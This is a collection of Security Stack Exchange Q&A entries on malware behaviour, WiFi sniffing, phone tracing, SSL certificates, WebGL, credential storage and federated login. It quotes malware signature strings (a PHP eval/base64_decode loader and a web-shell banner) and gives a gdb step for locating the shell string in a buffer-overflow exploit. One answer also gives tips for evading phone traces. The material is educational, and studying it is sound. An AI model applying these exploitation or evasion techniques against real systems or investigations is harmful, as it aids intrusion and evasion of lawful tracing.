12,593 | Recently my php-based website got infected with malware (probably by a stolen ftp password). Basically, every 30 minutes a file frame_cleaner_php.php was uploaded, a HTTP-GET was done on it to execute it and it was removed. I was able to intercept a copy of the file and analyze it. It was not obfuscated in any way and was quite easy to read. In essence it recursively scanned all php-files, looked for 20 signatures of infections by common other malware (like <?php eval(base64_decode(" or <?PHP # Web Shell by oRb ) and crudely removed the lines with that infection. Because of a false positive some lines in my own php files where removed causing the site the go down. This was probably just an unintended side effect of the malware. The big question: why would malware do this, what is there to gain? | There is two explanations as I see it. Fight over the box The different malware types want to single-handedly own the box and not share it with others. It will therefore try to patch the system and remove other malware and leave a backdoor for the creator. Ethical worms Malware that spreads only to patch and remove other malware is often referred to as "white worms" or "ethical worms". These types of worms have very many liability issues so they are rarely seen. 2022.04.17 edit: Anti-Forensics, Anti Reverse-Engineering Malware could also be misplaced on a system. Infected by accident, the attackers would want to remove it to prevent analysis. | {
"source": [
"https://security.stackexchange.com/questions/12593",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7319/"
]
} |
12,596 | Provided that the hacker knows the WiFi password if any (WEP or WPA), is he capable of sniffing network data of other hosts connected to the same access point? | If an attacker has the password, then they could, for example, use Wireshark to decrypt the frames . (Note, however, there's no need to have a WEP password since it is a completely broken security algorithm. WEP keys can be extracted from the encrypted traffic by merely capturing enough packets . This usually only takes a few minutes. Also, keep in mind that not all APs are built the same. Some can direct the RF beam in a much more focused way. Therefore, although you may be connected to the same AP, you may not be able to see all of the other traffic.) | {
"source": [
"https://security.stackexchange.com/questions/12596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4508/"
]
} |
12,659 | Even since growing up, I've watched films in which the "bad guy" is repeatedly tracked down when they call the police or FBI or police force de jour. They always have "about 30 seconds". Regardless of whether those specific realizations are accurate or not, I've never understood what is going on technically when a phone is traced. This question has three related parts: What are the technical aspects to tracing a phone call; is it more difficult for mobile phone? Is it more difficult if the phone is on, but not actively being used to call? Why are the tools necessary to trace phone calls not available to the general-public? We have traceroute to find routing information for IPs -- why not phones? Is it a question of specialized equipment, access to telecom systems, etc. or more social? How does one prevent a (mobile) phone from being traced? | What are the technical aspects to tracing a phone call; is it more difficult for mobile phone? In the old days, signaling was inline, hence the 2600hz hack. Calls were setup as one switch talked to another, then another, and so on until a circuit was established end-to-end. In the modern age, everything is out-of-band over SS7 and every switch is lined up at the same time. The calling station is identified at the start and no tracing is really necessary. Mobile phones do take more effort because a mobile number isn't attached to a given switch. Thus, while the far end knows what the number is, where it is involves extra technology. The cellular phone company can identify what towers the phone is associated with and thus instantly know the region it is in. Further narrowing can be done based on signal strength comparisons, which of the tower's directional antennas are holding the signal, and GPS chips in phones. Is it more difficult if the phone is on, but not actively being used to call? Only a custom phone would act in a way where it didn't respond to the tower asking a question, so generally no. Why are the tools necessary to trace phone calls not available to the general public? We have traceroute to find routing information for IPs -- why not phones? Is it a question of specialized equipment, access to telecomm systems, etc. or more social? Social legacy and equipment access. The Internet doesn't have a separate signaling band and is based on the idea of independent operators controlling where their traffic goes. The phone company is based on the legacy of one company running the show. Switch access in the phone world is internal only to the phone company or whoever they want to specifically include. The Internet, on the other hand, doesn't really have a way of considering nodes special since everything is in the same band. How does one prevent a (mobile) phone from being traced? Nothing will save you from being traced down to the tower you're using, but you can really screw around with the triangulation metrics by using a directional antenna and some weak false associations or intermediary transmission layer such a radio that links you to your phone. In that case, finding your phone would leave the person chasing you still lacking a physical connection and having to trace something else. Done right, you can turn the default, "Within 100 feet," into, "Somewhere in this 20 square mile cone." That is a big time, knowledge, and equipment cost commitment, though. You may also find some success in delaying tracing by using intermediate PBX systems to mask the actual caller. If you have dial-in access to a company's PBX, the trace will stop there and somebody will have to look at logs of associated calls into the system to try and correlate the responsible line. Nest a few of those and you may buy some time. You'll probably still eventually be traced no matter how short the call was, but it will no longer be instant. | {
"source": [
"https://security.stackexchange.com/questions/12659",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6249/"
]
} |
12,664 | DuckDuckGo is a search engine that claims it will not share your results with others. Many of my skeptical coworkers think it may be a scam. Is there any proof that any web search engine will protect your privacy as it advertises? | There is no proof that DuckDuckGo operates as advertised. (There never is, on the web.) However, that is the wrong question. DuckDuckGo is very clear in its privacy policy . DuckDuckGo says it doesn't track you , it doesn't send your searches to other sites , by default it does not use any cookies , it does not collect personal information , it does not log your IP address or other information about your computer that may be sent automatically with your searches , it doesn't store any personal information at all . Those are pretty strong promises, with no weasel-wording. And, as far as I can see, DuckDuckGo's privacy policy seems like a model privacy policy. It is a model of clarity, plain language, and lack of legal obfuscation. And privacy policies have bite. The FTC has filed lawsuits after companies that violate their own advertised privacy policy. (Not just little companies you've never heard of: They even went after Facebook!) The way privacy law works in the US is, basically, there are almost no privacy rules that restrict what information web sites can collect -- except that if they have a privacy policy, they must abide by it. Breaching your own privacy policy may be fraud, which is illegal. Also, violating your own privacy policy represents "unfair or deceptive acts or practices", and the FTC is empowered to pursue anyone who engages in "unfair or deceptive acts or practices" in court. DuckDuckGo would be pretty dumb to breach their own privacy policy; their privacy policy is clear and unambiguous and leaves them little wiggle room. No, I don't think that DuckDuckGo is a scam. I think that's crazy talk. Given the incentives and legal regime, I think you should assume DuckDuckGo follows their own privacy policies, until you find any information to the contrary. | {
"source": [
"https://security.stackexchange.com/questions/12664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
12,701 | I have a bunch of Linux machines that I wish to administer over the Internet. I currently use SSH keys, but have been advised to use 2-factor authentication. SSH Keys are something you know. Is an IP address something you have? (Yes, IP can be spoofed, but so can biometrics and so can atm cards). Could I lock down SSH to only allow connections from my IP range and would that be considered 2-factor in conjunction with SSH keys? | I would think of an IP address as being "somewhere you are" rather than any of the traditional "something you know", "something you have" and "something you are" that are part of 3-factor authentication. Although IP addresses are trivial to spoof, TCP connections are not and SSH is a protocol built on top of TCP. The IP address of a TCP connection is a reliable indicator of who you are directly connected to. Let's say I limit SSH connections to just my office IP address, an attacker is going to have to do one of: Be in or near (if he cracks the wireless) my office Be on the path between my office and my server (say inside our ISP). Control a machine within my office. Point 3. allows the attacker to be anywhere in the world but it increases the difficulty of an attack. Points 1. and 2. significantly reduce the number of people who can successfully use the other factors (such as your SSH key or password) if they manage to acquire them and hence I see it as being worthwhile. The quality of the IP address is a big factor here. I used my office as the example above but if you have a dynamic IP address, do you trust the entire range your ISP owns? How does that affect how easy it is for an attacker to get one of those IP addresses? Does the trustworthiness of an IP address change when you know there are 10 machines hidden by NAT behind it? What if there are 2,000 machines and 100 wireless access points? I would not consider an IP address to be a factor on its own. | {
"source": [
"https://security.stackexchange.com/questions/12701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1450/"
]
} |
12,740 | I know this is tin-foil hat fodder, but at least one judicial opinion referenced a bug that could track/listen in on the subject "whether the phone
was powered on or off," although that may have been a judge misinterpreting the technobabble spouted at him, or an FBI agent overhyping their tech to the judge. It seems like with smartphones all the rage now, it would be possible, e.g. to create a root kit that would simply mimic the phone entering a powered down state while still transmitting, although this would have an obvious effect on battery life unless it actually powered down most of the time and just woke up to transmit basic location information in a heartbeat configuration. Is there anything similar out there in use by either "good guys" or "bad guys" that you know of? | A Korean researcher demonstrated this on Samsung Smart TVs at Black Hat this year. ( Slide deck here .) He mentions that the malware was originally designed for cell phones, and that TV sets were even easier to attack because battery life did not give them away. His basic premise is that if he owns your device, he owns the power indicators, too. Remote power-on isn't a problem when it's never actually powered off. | {
"source": [
"https://security.stackexchange.com/questions/12740",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8453/"
]
} |
12,828 | I've implemented a Forgot Password service in the following way: User goes to login page, clicks on "Forgot password?" User is presented with a form that asks for their email address. Email is sent to given address if in the database, with a link that contains a (supposedly) unique, long, randomly generated string, which is also stored in the database along with the time requested, allowing for a time limit to be set on the link (which it is) User clicks on link, it is validated, they are then asked to provide a new password. That's fairly standard, (though I could change small aspects of it), but it made me wonder - since good passwords are so infrequently provided/remembered, why not dispense with the password altogether and use the Forgot Password system instead? User goes to login page, fills out email address (or maybe a username to be more secure?) Email is sent with link. Link has very short time limit (< 5 mins) validity. User clicks link, they're in. In both scenarios, the user's email security - whether sniffed or broken in to - is the common threat, but in the second scenario: The link is valid for a much shorter time. It is also likely to be used up more quickly (any sort of validation email can be left alone, but if you definitely want to log in now you're going to use up that link when you get it). The user doesn't get to provide a shoddy password. The user only has to remember one password. A single account can't be shared among several people (unless they share an email address). An automated attack needs to break in to the email system and wait for an email, which is likely to be longer than the wait for a password to be unhashed i.e. better than bcrypt. I'm just wondering what are the downsides? I can see: User irritation, perhaps at having to wait for an email or log in to their email too It would likely open a new browser window, which can be irritating if you want to organise tabs A user might realise they have to protect their email account with a better password, change it, and then lock themselves out :-) It's just a thought. Thanks to everyone who put forth an answer, there are some really interesting (and definitely valid) points made that have really made me think and given me more areas to investigate. D.W. gets the tick because of the link provided that gives further insight into this particular type of situation, but I really appreciate all the answers given. | That's reasonable. From a security perspective, it is reasonable. I know some people who never write down their passwords for web servers; they just use the "forgot my password" link every time they want to log in. From a usability perspective, it might be a bit unfortunate, because email isn't instantaneous. Users will have to click "Email me", then wait for the email to show up, then click on the link in their email. Unfortunately, if users have to wait a few minutes (or even just 15 seconds) for the email to show up, they might get annoyed, give up, and go do something else -- or go to your competitor. A further improvement. It is possible to improve the idea a little bit further, to reduce the usability impact. When the user clicks the link in the email, you could set a persistent secure cookie on their browser. The result is that when the user clicks the link, they're in, and they won't need to go through the rigamarole again in the future on this computer (unless they clear their passwords). On future visits from the same computer, the site will automatically recognize them and no login or links will need to be clicked. This is not appropriate/sufficient for high-security services, like online banking, where you need to prevent the user's roommate from logging into their account -- but it might be fine for most web sites. Evaluation. Here is a research paper that investigates this approach and finds it provides increased security against the attacks evaluated in the paper: Chris Karlof, J.D. Tygar, and David Wagner. Conditioned-safe Ceremonies and a User Study of an Application to Web Authentication . NDSS 2009. | {
"source": [
"https://security.stackexchange.com/questions/12828",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8518/"
]
} |
12,896 | In Tangled Web Michal Zalewski says: Refrain from using Content-Type: application/octet-stream and use application/binary instead, especially for unknown document types. Refrain from returning Content-Type: text/plain. For example, any code-hosting platform must exercise caution when returning executables or source archives as application/octet-stream, because there is a risk they may be misinterpreted as HTML and displayed inline. The text/plain logic subsequently implemented in Internet Explorer and Safari in order to detect HTML in such a case is really bad news: It robs web developers of the ability to safely use this MIME type to generate user-specific plaintext documents and offers no alternatives. This has resulted in a substantial number of web application vulnerabilities, but to this day, Internet Explorer developers seem to have no regrets and have not changed the default behavior of their code. Site uses X-Content-Type-Options:nosniff . Author says the following about this header: The use of this header [X-Content-Type-Options] is highly recommended; unfortunately, the support for it [...] has only a limited support in other browsers. In other words, it cannot be depended on as a sole defense against content sniffing. What content sniffing attacks X-Content-Type-Options:nosniff doesn't prevent? What Content-Type should be returned to user instead of text/plain ? | Background. X-Content-Type-Options: is a header that is designed to defend against MIME content-sniffing attacks . MIME content-sniffing attacks are a risk when you allow users to upload content (e.g., images, documents, other files) to your website, where they can be downloaded by other users. As @Rook says, this has nothing to do with eavesdropping/capturing network traffic. What attacks doesn't it prevent? Because X-Content-Type-Options: is only supported on some browsers, it does not protect attacks against users who use other browsers. In particular, it is supposed on IE, Chrome, and Firefox 50 . See also What are the security risks of letting the users upload content to my site? for some other attacks it doesn't prevent, e.g., uploading of malware or unsavory content, uploading of content that exploit a vulnerability in the user's browser, etc. What content type should be returned? You should return the appropriate content type for that file. You should not allow users to upload untrusted content with dangerous content types. For more details, please see the answers to the following questions: Is it safe to serve any user uploaded file under only white-listed MIME content types? Is it safe to store and replay user-provided mime types? MIME sniffing protection Why should I restrict the content type of files be uploaded to my site? What are the security risks of letting the users upload content to my site? How can I be protected from pictures vulnerabilities? Using file extension and MIME type (as output by file -i -b) combination to determine unsafe files? This topic has been extensively discussed and documented elsewhere on this site, so I'm not going to try to repeat all of the useful advice found there. Update: I just learned that setting the Content-Type and X-Content-Type-Options headers appropriately is not enough for security. Apparently, Flash ignores the Content-Type header , which could allow loading a malicious SWF, which can then do everything you'd do with a XSS. (Sigh, stupid Flash.) Unfortunately, no amount of whitelisting of file content types can stop this attack. Consequently, it appears that the only safe solution is to host the user-uploaded content on a separate domain. | {
"source": [
"https://security.stackexchange.com/questions/12896",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5501/"
]
} |
13,105 | I know this newspaper article sounds absurd. Even if a machine is compromised we (should) have hardware safe guards in all our devices to prevent the software from damaging the hardware. But is it possible to make a computer explode or catch fire? Has this ever been done? | In 2011 the news was reporting on HP Printers catching fire . HP Responded saying that there was a hardware element called a "thermal breaker" to prevent this from happening. The researcher never produced a burning pile of printer. Also in 2011 Charlie Miller was researching the firmware on Apple's batteries trying to get them to explode or catch fire.
However the worst he was able to do was brick the battery. Edit Feb 2014 - CrowdStrike demonstrated an attack at RSA on a Mac which overrode temperature controls, powered off the fans and spiked the CPU usage in order to overheat the machine. And while this specific example was limited as fires are not welcomed in the Moscone Centre, the ateam state that they can cause the machine to catch fire. Now lets flash back to 1985. The Therac-25 radiation therapy machine is killing people due to a bug in how the software interacted with hardware. An eariler model had "Hardware Interlocks" which prevented the operator from accidentally overdosing patents with radation. All of the devices we use should have a hardware control preventing software from damaging the physical world. But there are some systems where its impractical for hardware to prevent all damage to physical systems. This is the real fear behind vulnerabilities in SCADA systems . It maybe possible for an attacker to remove safety controls used by a power plant or put it into an unstable state. An example of this happening in real life is Stuxnet being used to destroy centrifuges . There is some evidence to suggest that a hacker was the cause of a missile explosion at an Iranian Military base . So if the computer happens to also be a bomb, then yes, a hacker can probably make it explode. | {
"source": [
"https://security.stackexchange.com/questions/13105",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/975/"
]
} |
13,165 | I have an account in an online banking system and they have the FAQ with something like this: How secure is the <Online Banking System Name> ? Each page you view and any information submitted on <Online Banking System Name> is encrypted between the client's computer and the <Online Banking System Name> server using 128-bit SSL... Sensitive data is encrypted Sensitive data such as the client's <Online Banking System Name> password is encrypted using a one-way 160-bit hash cryptographic algorithm that turns an arbitrary-length input into a fixed-length binary value, and this transformation is one-way, that is, given a hash value it is statistically infeasible to recreate a document that would produce this value... Does this make their online banking system more prone to malicious attack? | Is it alright to tell everyone your encryption information? It's not just alright, it's actually a design feature of modern ciphers. The whole concept of cryptography is that you can freely publish the algorithm used, but must keep secret a specific piece of information, called the key. password is encrypted using a one-way 160-bit hash cryptographic algorithm Encrypted is the wrong word here - this is not encryption; rather, it's hashing. Encryption is a reversible process where recovery of the data is the aim of the game. A hash function, however, is designed such that it is "one way", i.e. it is trivial to take a given input and produce the hash, but hard to go backwards. If you think about it, this makes an awful lot of sense - the bank don't need to know your password; they only need to know that the person entering the password has entered the same one as you initially told them. So, by storing the hash of your password, they can compare future password inputs against that password and voila! They need not know the password, but they can check it. Technically, they're on the right lines; 160 bits suggests an SHA1 or RIPEMD160 algorithm. However, if a simple hash is all they do, there is more they can do to improve security: Use a salt value, ideally uniquely generated per password. Use a slow hashing function such as PBKDF2. | {
"source": [
"https://security.stackexchange.com/questions/13165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7493/"
]
} |
13,194 | I have to exploit a very simple buffer overflow in a vulnerable C++ program for an assignment and I am not being able to find the environment variable SHELL. I have never worked with BoF before, and after reading lots of similar questions, posts, etc. I have this information (correct me if it's wrong): The program stores the environment variables in a global variable called environ I can find the address of this variable like this: (gdb) info variable environ
All variables matching regular expression "environ":
Non-debugging symbols:
0xb7fd1b00 __environ
0xb7fd1b00 _environ
0xb7fd1b00 environ I need to find the /bin/bash string in that variable to launch a shell (I have already got the system and exit addresses, I only need the route to the shell). And here is where I don't know what to do. I have been reading gdb tutorials, but still nothing. x/s 0xb7fd1b00 does not output anything useful. | environ is a pointer to pointer, as it has the type char **environ . You have to try something like: (gdb) x/s *((char **)environ)
0xbffff688: "SSH_AGENT_PID=2107"
(gdb) x/s *((char **)environ+1)
0xbffff69b: "SHELL=/bin/bash" | {
"source": [
"https://security.stackexchange.com/questions/13194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8143/"
]
} |
13,353 | My connection.php file stores the credentials to connect to the database: <?php
$objConnect = mysql_connect("localhost","username","password");
mysql_select_db("selectDB", $objConnect);
?> When a page need to connect the database I just use <?php include("connection.php"); ?> . Is this safe? Can hackers steal my credentials from that file? | My recommendation: Don't store passwords in source code. Instead, store them in a configuration file (outside of the web root), and make sure the configuration file is not publicly accessible. The reason is that you normally don't want to keep your passwords checked into the source code repository or exposed to everyone who can view files in your web root. There is an additional risk with storing passwords in a .php file within your webroot, which is a bit obscure but can be easily avoided by placing the file outside of your web root. Consider: if you are editing connection.php using a text editor, and your connection drops while you are editing it, your editor will automatically save a copy of the connection.php file in some backup file: e.g., connection.php~ (in the same directory). Now the backup file has a different extension, so if someone tries to fetch that file, the Apache server will happily serve up a copy of the file in plaintext, revealing your database password. See 1% of CMS-Powered Sites Expose Their Database Passwords for details. See also How do open source projects handle secure artifacts? , Open Source and how it works for secure projects? | {
"source": [
"https://security.stackexchange.com/questions/13353",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8849/"
]
} |
13,361 | I was browsing a website, and stumbled across a sample scheme for password-protecting web pages. The owner of the website specifically had a page that invited people to attempt to hack it. I wanted to give it a try, so I wrote up a quick python script a few hours ago to try brute-forcing the password. (Which, in retrospect, was a stupid idea). I left the script running for a few hours, but came back to find that my script was running haywire and the website was returning '509 Bandwidth limit exceeded' errors on all its pages. ( [EDIT]: I also checked via 3g on my phone, and using a school computer, so I know it's not limited to just my ip address) This is not something I had intended to do, and feel really, really bad about it. Should I send an email apologizing and offering to pay reparations?
Or am I just unnecessarily worried, and should let this blow over? (I'm also not sure where in stackexchange to ask this question, but I think it might fit here). [UPDATE]: I sent an email apologizing -- once the site owner responds, I'll update this post. [UPDATE]: Well, it's been several days now. The website is still down and the owner hasn't responded yet. I originally wanted to wait for a response first before accepting an answer, but it might be a while, so I'll pick an answer. | First off, let me say this: I respect the ethics of anyone who would ask this kind of question (rather than just closing their eyes, walking away, and forgetting the whole thing). My compliments to you. Ultimately, this is a matter of personal ethics, so it is hard to give advice. You need to do what you feel is right. That said, your suggestion to try contacting the site owner seems reasonable to me. I suspect that any harm done will be minor or that the cost will be minor. Normally, the cost of bandwidth is pretty modest, in monetary terms. But the site owner might appreciate hearing that his/her site is unreachable, and appreciate the apology. But it's up to you, and what feels right to you. | {
"source": [
"https://security.stackexchange.com/questions/13361",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8855/"
]
} |
13,453 | After running a few tests from Qualsys' SSL Labs tool, I saw that there were quite significant rating differences between a GoDaddy and VeriSign certificate that I have tested against. Are all SSL certificates from different providers equal? If not, what should one base their decision on? Currently I believe that most people will weigh up the cost vs. brand (I.e.: GoDaddy ~$70.00 vs. Verisign ~$1,500.00). I have a feeling from what I have seen that a lot of this also depends on how the SSL is actually implemented - would this be a more accurate conclusion? For clarity: Godaddy SSL Lab Report Google SSL Lab Report | Disclaimer: This answer comes directly from the eHow article . No infringement intended. Domain Validation SSL Certificates Domain validated SSL certificates are used to establish a baseline level of trust with a website and prove that you are visiting the website you think you are visiting. These certificates are issued after the SSL issuer confirms that the domain is valid and is owned by the person who is requesting the certificate. There is no need to submit any company paperwork to obtain a Domain Validation SSL certificate, and these types of SSL certificates can be issued extremely quickly. The disadvantage to these types of certificates is that anyone can get them, and they hold no real weight except to secure communication between your web browser and the web server. Organization Validation SSL Certificates An Organization Validation SSL certificate is issued to companies and provides a higher level of security over a Domain Validation SSL certificate. An Organization Validation certificate requires that some company information be verified along with domain and owner information. The advantage of this certificate over a Domain Validation certificate is that it not only encrypts data, but it provides a certain level of trust about the company who owns the website. Extended Validation SSL Certificates An Extended Validation SSL Certificate is a "top of the line" SSL certificate. Obtaining one requires that a company go through a heavy vetting process, and all details of the company must be verified as authentic and legitimate before the certificate is issued. While this certificate may seem similar to an Organization Validation SSL certificate, the key difference is the level of vetting and verification that is performed on the owner of the domain and the company that is applying for the certificate. Only a company that passes a thorough investigation may use the Extended Validation SSL certificate. This type of certificate is recognized by modern browsers and is indicated by a colored bar in the URL portion of the browser. Additonally, OV versus EV also have an impact in terms of insurance amounts in case of compromise. The insurance premium for an EV lies a lot higher than with an OV. Read more/original: Mickey Walburg, Differences in SSL Certificates | eHow.com | {
"source": [
"https://security.stackexchange.com/questions/13453",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/493/"
]
} |
13,624 | Most of the banks use a 128-bit or 256-bit encryption. What does this mean? Does it mean that the keys used in SSL are 128-bit long or what? If they are the SSL key lengths then 128 bit RSA keys are easy to decrypt. The rsa site itself recommends keys having length of 1024 bits or more. | You can pretty much ignore the statements about 128 and 256 bits. It is a marketing statement intended to sound impressive, but really it just means that they are using SSL in a not-totally-stupid way. (It means the symmetric-key cipher is using a 128-bit or 256-bit key. This ensures that the symmetric cipher is not the weakest link in the chain. However since the symmetric cipher is not the weakest link in the chain, the risks will be primarily elsewhere, so you shouldn't get too caught up in the meaning of 128- or 256-bit strength. This just means that they haven't chosen a stupid configuration that makes the symmetric key readily breakable. It does not mean that the RSA key is 128 bits or 256 bits; as you say, a 128-bit or 256-bit RSA key would be totally insecure.) There is a lot written about this topic on this site. I suggest you read Is visiting HTTPS websites on a public hotspot secure? . Also see the blog entry QotW #3: Does an established SSL connection mean a line is really secure? .
And read Is accessing bank account on the internet really secure? and Does an established ssl connection mean a line is really secure . Doing a search on this site will find lots of information -- give it a try! | {
"source": [
"https://security.stackexchange.com/questions/13624",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8201/"
]
} |
13,640 | I know the title is just baiting the "your setup is insecure", but allow me to explain. I'm working on an application which aims to allow clients to rsync over SSH to our server. We need a web application from which we can create/rotate SSH keys for our users. This application will return a private SSH key to the user for their future use and will store the public key user's authorized_keys file. Upon registration, we'll need to automatically create the user and initial .ssh directory and keys. We're on CentOS 5 now, but we're flexible if there's sufficient reason to migrate. This server will be running only this web application in Apache (as apache:apache) and no data other than the synchronized user data will be stored on the system. I've been thinking about the following solution, but have been running into trouble: Grant sudo useradd privileges to the apache user to allow them to create new users Call sudo useradd from the PHP script in the web application with a umask of 000 on the newly created home directory. chgrp the new home directory to apache so that apache will be able to create a new .ssh directory and write the keys.* chmod the new home directory to 770 so that only the user and apache have access.* mkdir .ssh in the new home directory and ssh-keygen to create the new key, storing the public key in authorized_keys and passing the private key back to the calling client. The problems I'm encountering are with the *d points -- it seems that, even with chmod 777 I'm not able to chgrp or chmod the directory, as it's been created with the owner and group belonging to the new user. I've looked at changing the user's default group to something that would allow apache to write to it, but I can't find a way to do that without having to grant apache usermod sudo privileges, which seems like a really bad idea. Any thoughts would be appreciated! | You can pretty much ignore the statements about 128 and 256 bits. It is a marketing statement intended to sound impressive, but really it just means that they are using SSL in a not-totally-stupid way. (It means the symmetric-key cipher is using a 128-bit or 256-bit key. This ensures that the symmetric cipher is not the weakest link in the chain. However since the symmetric cipher is not the weakest link in the chain, the risks will be primarily elsewhere, so you shouldn't get too caught up in the meaning of 128- or 256-bit strength. This just means that they haven't chosen a stupid configuration that makes the symmetric key readily breakable. It does not mean that the RSA key is 128 bits or 256 bits; as you say, a 128-bit or 256-bit RSA key would be totally insecure.) There is a lot written about this topic on this site. I suggest you read Is visiting HTTPS websites on a public hotspot secure? . Also see the blog entry QotW #3: Does an established SSL connection mean a line is really secure? .
And read Is accessing bank account on the internet really secure? and Does an established ssl connection mean a line is really secure . Doing a search on this site will find lots of information -- give it a try! | {
"source": [
"https://security.stackexchange.com/questions/13640",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8628/"
]
} |
13,664 | I recently read an article about researchers being able to penetrate the Facebook network and making lots of friends with about 100 "Social" bots. What would prevent somebody to do the same on Stack Exchange sites, so as to increase his reputation? He might do this in order to finance bounties and have questions answered quickly for free. Update : how I imagined an attack: Initial seeding: create 100 profiles on a Stack Exchange site; Have a Social Bot manage each profile; Slowly (i.e., during several weeks) Social Bots post questions, post answers (to questions asked by other Social Bots), up questions and answers. Result: you end up with 100 profiles having a pretty good reputation. | Stack Exchange has multiple layers of security preventing this. Captchas and email addresses are required. The email check is easy to beat with a script, but the captchas aren't; you'd need a Captcha breaking service to even get this off the ground. None of your bots can vote at the start, so you can't accumulate rep just by posting questions; human eyes have to look over your post and manually give you your first reputation. At best your bots could get rep only by other bots accepting answers. After each bot gets an accepted answer they would be able to upvote however. Once they can upvote you start running into fraud detection ; cross voting where a significant % of votes are split between two users are automatically flagged for moderator attention, and serial upvotes (more than a couple inside of a few minutes) would automatically be reversed, so you'd have to be VERY careful in how you implement this. Even if you surpass the automated fraud detection, which would require significant effort and tools programmed specifically for the Stack Exchange Network , you run into the problem of human moderation . All posts on SE are getting human eyeballs on them. If your bots are asking duplicate questions, they're going to get closed. If they're asking gibberish or spam questions, they're going to get deleted, and deleted posts don't earn rep (certain outstanding circumstances aside). Basically your bots would have to post actual, new, good questions in order to not be found out and shut down. SE has some okay automatic detection scripts here, but there's no way an army of bots would go unnoticed simply because you'd need an amazing artificial intelligence to actually write enough new questions and answers to pull this off. Facebook hacking can be a lot easier because no one has to see your bot friends; Facebook profiles can go without human scrutiny, Stack Exchange posts cannot. I'm not a Stack Exchange employee however, so there may well be additional security measures I'm unaware of, but as a user and moderator those are the significant points I'm aware of. | {
"source": [
"https://security.stackexchange.com/questions/13664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8765/"
]
} |
13,666 | I have Active Directory Certificate Services on my server, which makes it possible for me to deliver an SSL certificate for the websites hosted on the same server. I know that normally, I need to acquire a certificate from a known certification authority. But I have my reasons¹ for not doing it. That's not the point. The question is, what could be (if any) the security risk of hosting the certificate yourself, instead of using the services of a known authority? ¹ The reasons being that (1) I'm a geek and it's fun to create your own certificates, that (2) I want to test Certificate Services, and that (3) I don't care about browsers complaining about the fact that they don't know about me, because I will be the only one to use HTTPS. | Using an SSL certificate for your websites primarily gets you two things: Identity proofing that your website is who it says it is Stream encryption of the data between the webserver and the client By doing what you propose, which is normally called self-signing, prevents you from relying on the identity proofing. By using a known trusted CA the client can follow the signature chain from the certificate you present up to a root level trusted CA and gain some confidence that you are who you say you are. (It should be noted that this trust is really more like faith as CA compromises do occur and some CAs take proofing much more seriously than others.) You will, however, still have the data encryption. So if you don't need the trust aspect, then you should be fine. Personally, I have several web sites and webapps at home that I use self-signed certificates for. Since I'm the only user, I can reasonably verify the certificate manually without the need for a 3rd party to tell me that the computer under my own desk is really the computer under my desk. | {
"source": [
"https://security.stackexchange.com/questions/13666",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7684/"
]
} |
13,799 | Is WebGL a potential security problem due to the low level access it provides? For example, a web page can attempt to compile and run any shader source it wants. It seems that security would especially be a problem with open source web browsers, as an attacker could more easily find vulnerabilities in the implementation. | Yes, WebGL is indeed a potential security risk, though the magnitude of the risk is hard to assess and open to debate. There are some tricky issues here. The browsers have put in place some defenses against the security risks, but there seems to be some debate about whether those defenses will prove adequate in the long run. One major risk is that WebGL involves running code directly on the video card, and exposing APIs that provide direct access to video card APIs. The browser does attempt to sandbox this code (to a certain extent), and browsers do enforce a number of security restrictions designed to prevent malicious behavior. However, many of these APIs and their implementations were not originally designed to be provided to untrusted entities (they were only usable by native applications, which are fully trusted), so there are concerns about whether exposing them to arbitrary web sites might enable web sites to attack your system. There was one high-visibility white paper (see also the sequel ) which looked at the security of the WebGL implementation in browsers at the time, and found a number of vulnerabilities. They found some memory safety issues in several WebGL APIs, and also found some attacks that would allow one web site to read pixel data of other web sites (which could enable a breach of confidentiality). See also this third study , which demonstrated the existence of these vulnerabilities on a number of browsers and web cards (at the time). Browsers have responded to this with a variety of defenses: they have blacklisted video cards with known security problems; they have tried to fix the known memory safety problems; and they have restricted use of WebGL per the same-origin policy , to prevent a malicious web site from using WebGL to spy on users' use of other web sites . There is some ongoing debate over whether these defenses will prove adequate in the long term. Microsoft has taken the position that WebGL is too great a security risk and the existing defenses are not robust enough . On the other hand, Mozilla takes the position that the defenses they have put in place will be adequate, and that WebGL provides important value to the web. Ars Technica has an excellent round-up of the issue ; and here is another press report . P.S. I completely disagree with your statement about it being particularly a problem for open source web browsers. That's a myth. See Open Source vs Closed Source Systems , which already covers these arguments. (See also Chrome vs Explorer - how to explain in plain words that open-source is better? for additional thoughtful discussion on this topic.) | {
"source": [
"https://security.stackexchange.com/questions/13799",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
13,803 | What is the difference between Federated Login and Single Sign On authentication methods? | Single Sign-on (SSO) allows users to access multiple services with a single login. The term is actually a little ambiguous. Sometimes it's used to mean that (1) the user only has to provide credentials a single time per session, and then gains access to multiple services without having to sign in again during that session. But sometimes it's used to mean (2) merely that the same credentials are used for multiple services; the user might have to login multiple times, but it's always the same credentials . So beware, all SSO's are not the same in that regard. Many people (me included) only consider the first case to be "true" SSO. Federated Identity (FID) refers to where the user stores their credentials. Alternatively, FID can be viewed as a way to connect Identity Management systems together. In FID, a user's credentials are always stored with the "home" organization (the "identity provider"). When the user logs into a service, instead of providing credentials to the service provider, the service provider trusts the identity provider to validate the credentials. So the user never provides credentials directly to anybody but the identity provider. FID and SSO are different, but are very often used together. Most FID systems provide some kind of SSO. And many SSO systems are implemented under-the-hood as FID. But they don't have to be done that way; FID and SSO can be completely separate too. | {
"source": [
"https://security.stackexchange.com/questions/13803",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9151/"
]
} |
